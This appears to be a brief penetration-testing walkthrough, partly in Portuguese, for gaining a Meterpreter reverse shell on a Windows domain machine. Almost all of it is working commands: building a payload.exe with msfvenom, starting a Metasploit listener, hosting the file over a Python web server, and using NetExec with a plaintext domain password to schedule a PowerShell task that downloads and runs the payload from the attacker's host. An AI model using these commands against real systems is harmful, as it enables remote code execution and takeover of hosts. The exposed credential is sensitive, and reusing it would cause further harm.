Reverse Shell Payload Setup

  • Esse comando deve criar um payload.exeexecutável do Windows no seu diretório de trabalho atual, e podemos usá-lo como parte da nossa cadeia de ataque para obter um retorno de chamada do Meterpreter da conta de domínio

YOUR_KALI_IP_ADDRESS=$(ip addr show eth0 | grep "inet\b" | awk '{print $2}' | cut -d/ -f1)

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=${YOUR_KALI_IP_ADDRESS} LPORT=4444 -f exe -o payload.exe

Metasploit Listener Setup

  • Faremos isso simplesmente com o Metasploit:

msfconsole
  • Quando o Metasploit estiver pronto para instruções no msf6 >prompt, podemos selecionar o módulo para ouvir e corresponder a todos os parâmetros anteriores que usamos anteriormente com msfvenom.

use multi/handler

set payload windows/x64/meterpreter_reverse_tcp
set LHOST 0.0.0.0
set ExitOnSession false
set LPORT 4444

Hosting Our Payload

python3 -m http.server

Getting our Callback

YOUR_KALI_IP_ADDRESS=$(ip addr show eth0 | grep "inet\b" | awk '{print $2}' | cut -d/ -f1)

nxc smb 10.0.29.208 -u "benjaminm" -p "w5gzI6&xx%aBqZC^GZ" -M schtask_as -o USER=${LOGGEDIN_USER} CMD="powershell \"iwr -Uri http://${YOUR_KALI_IP_ADDRESS}:8000/payload.exe -OutFile C:/Windows/Tasks/payload.exe; C:/Windows/Tasks/payload.exe\""

Last updated